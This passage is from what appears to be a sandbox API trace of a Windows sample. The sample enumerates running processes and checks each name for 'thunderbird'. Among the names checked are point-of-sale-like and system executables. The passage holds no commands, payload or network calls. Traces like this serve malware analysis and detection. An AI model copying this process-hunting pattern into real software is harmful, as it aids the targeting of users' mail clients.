lpUsedDefaultChar=0x0) returned 18 [0100.040] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357dd68 [0100.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357dd68, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0100.040] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0100.040] StrStrIA (lpFirst="creditservice.exe", lpSrch="thunderbird") returned 0x0 [0100.040] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0100.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.041] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c900 [0100.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x357c900, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0100.041] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0100.041] StrStrIA (lpFirst="edcsvr.exe", lpSrch="thunderbird") returned 0x0 [0100.041] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0100.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.042] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357cae0 [0100.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x357cae0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0100.042] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0100.043] StrStrIA (lpFirst="fpos.exe", lpSrch="thunderbird") returned 0x0 [0100.043] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0100.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.044] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c918 [0100.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x357c918, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0100.044] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0100.044] StrStrIA (lpFirst="isspos.exe", lpSrch="thunderbird") returned 0x0 [0100.044] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0100.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.045] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357de88 [0100.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357de88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0100.045] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0100.045] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="thunderbird") returned 0x0 [0100.045] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0100.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.046] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c948 [0100.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x357c948, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0100.047] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0100.047] StrStrIA (lpFirst="omnipos.exe", lpSrch="thunderbird") returned 0x0 [0100.047] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0100.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.048] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c960 [0100.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x357c960, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0100.048] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0100.048] StrStrIA (lpFirst="spcwin.exe", lpSrch="thunderbird") returned 0x0 [0100.048] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0100.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.049] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357df48 [0100.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357df48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0100.049] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0100.049] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="thunderbird") returned 0x0 [0100.050] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0100.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.050] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357c9d8 [0100.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x357c9d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0100.051] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0100.051] StrStrIA (lpFirst="utg2.exe", lpSrch="thunderbird") returned 0x0 [0100.051] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0100.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.052] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357cbe8 [0100.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x357cbe8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0100.052] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0100.052] StrStrIA (lpFirst="saying.exe", lpSrch="thunderbird") returned 0x0 [0100.052] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0100.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.053] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357ce88 [0100.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x357ce88, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0100.053] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0100.053] StrStrIA (lpFirst="ripe.exe", lpSrch="thunderbird") returned 0x0 [0100.053] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0100.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.054] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357cc30 [0100.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x357cc30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0100.054] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0100.055] StrStrIA (lpFirst="acoustic.exe", lpSrch="thunderbird") returned 0x0 [0100.055] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0100.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.056] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357cea0 [0100.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x357cea0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0100.056] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0100.056] StrStrIA (lpFirst="mail.exe", lpSrch="thunderbird") returned 0x0 [0100.056] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.057] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357cc78 [0100.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x357cc78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0100.057] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0100.057] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="thunderbird") returned 0x0 [0100.057] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.058] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cc00 [0100.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357cc00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.058] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.058] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0100.059] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0100.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.060] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357cde0 [0100.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x357cde0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.060] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0100.060] StrStrIA (lpFirst="dllhost.exe", lpSrch="thunderbird") returned 0x0 [0100.060] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.061] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357cd68 [0100.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357cd68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.061] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.061] StrStrIA (lpFirst="taskhostw.exe", lpSrch="thunderbird") returned 0x0 [0100.061] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0100.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.062] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357ce28 [0100.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x357ce28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0100.062] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0100.062] StrStrIA (lpFirst="UsoClient.exe", lpSrch="thunderbird") returned 0x0 [0100.063] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.064] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357ce40 [0100.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357ce40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.064] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.064] StrStrIA (lpFirst="taskhostw.exe", lpSrch="thunderbird") returned 0x0 [0100.064] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0100.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0100.067] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357dd88 [0100.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357dd88, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0100.067] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0100.067] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="thunderbird") returned 0x0 [0100.067] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0100.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.068] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357dd48 [0100.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357dd48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0100.068] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0100.068] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="thunderbird") returned 0x0 [0100.068] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0100.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.070] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356bff0 [0100.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356bff0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0100.070] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0100.070] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="thunderbird") returned 0x0 [0100.070] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.071] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357ccc0 [0100.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x357ccc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.071] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0100.071] StrStrIA (lpFirst="conhost.exe", lpSrch="thunderbird") returned 0x0 [0100.071] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.072] WideCharToMultiByte 